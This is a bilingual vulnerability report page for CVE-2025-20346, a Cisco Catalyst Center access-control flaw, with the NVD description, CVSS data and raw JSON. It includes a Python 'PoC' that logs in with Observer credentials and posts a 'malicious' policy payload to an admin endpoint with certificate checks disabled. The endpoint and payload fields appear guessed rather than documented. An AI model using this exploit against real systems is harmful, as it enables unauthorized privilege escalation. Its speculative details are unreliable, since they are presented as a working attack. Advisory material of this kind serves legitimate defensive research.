Security Vulnerability Report
中文
CVE-2025-20346 CVSS 4.3 MEDIUM

CVE-2025-20346

Published: 2025-11-13 17:15:46
Last Modified: 2025-11-19 17:16:37
Source: [email protected]

Description

A vulnerability in Cisco Catalyst Center could allow an authenticated, remote attacker to execute operations that should require Administrator privileges. The attacker would need valid read-only user credentials. This vulnerability is due to improper role-based access control (RBAC). An attacker could exploit this vulnerability by logging in to an affected system and modifying certain policy configurations. A successful exploit could allow the attacker to modify policy configurations that are reserved for the Administrator role. To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Observer.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:cisco:catalyst_center:*:*:*:*:*:*:*:* - VULNERABLE
Cisco Catalyst Center 存在未修复版本
需要关注Cisco官方发布的受影响版本列表和安全补丁

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-20346 PoC - Cisco Catalyst Center RBAC Bypass This PoC demonstrates privilege escalation via RBAC bypass in Cisco Catalyst Center. Note: This is for educational and authorized testing purposes only. """ import requests import json import sys # Configuration TARGET_HOST = "https://target-cisco-catalyst-center.local" OBSERVER_USERNAME = "observer_user" OBSERVER_PASSWORD = "observer_password" def exploit_cve_2025_20346(): """ Demonstrates the RBAC bypass vulnerability in Cisco Catalyst Center. An Observer role user can modify administrator-level policy configurations. """ session = requests.Session() # Step 1: Login with Observer credentials login_url = f"{TARGET_HOST}/dna/system/api/v1/auth/token" login_data = { "username": OBSERVER_USERNAME, "password": OBSERVER_PASSWORD } try: response = session.post(login_url, json=login_data, verify=False, timeout=30) if response.status_code != 200: print(f"[-] Login failed: {response.status_code}") return False token = response.json().get('Token') print(f"[+] Successfully logged in as Observer user") print(f"[+] Access token obtained: {token[:20]}...") # Step 2: Attempt to modify admin-level policy configuration # This endpoint should require Administrator role but is accessible with Observer role admin_policy_url = f"{TARGET_HOST}/dna/intent/api/v1/policy" headers = { "X-Auth-Token": token, "Content-Type": "application/json" } # Malicious policy configuration payload malicious_payload = { "policyName": "MaliciousPolicy", "policyDescription": "Modified by Observer via RBAC bypass", "policyType": "admin", "settings": { "privilegedAccess": True, "modifySystemConfig": True } } response = session.post(admin_policy_url, headers=headers, json=malicious_payload, verify=False, timeout=30) if response.status_code in [200, 201]: print(f"[+] VULNERABLE: Successfully modified admin policy as Observer user!") print(f"[+] Policy ID: {response.json().get('id')}") return True else: print(f"[-] Request blocked or failed: {response.status_code}") print(f"[-] Response: {response.text}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-20346 - Cisco Catalyst Center RBAC Bypass PoC") print("=" * 60) exploit_cve_2025_20346()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20346", "sourceIdentifier": "[email protected]", "published": "2025-11-13T17:15:45.630", "lastModified": "2025-11-19T17:16:36.880", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in Cisco Catalyst Center could allow an authenticated, remote attacker to execute operations that should require Administrator privileges. The attacker would need valid read-only user credentials.\r\n\r\nThis vulnerability is due to improper role-based access control (RBAC). An attacker could exploit this vulnerability by logging in to an affected system and modifying certain policy configurations. A successful exploit could allow the attacker to modify policy configurations that are reserved for the Administrator role. To exploit this vulnerability, the attacker must have valid credentials for a user account with at least the role of Observer."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cisco:catalyst_center:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.7.10", "matchCriteriaId": "5C88A587-FFF4-493C-823F-F958374FC6B6"}]}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-privesc-catc-rYjReeLU", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.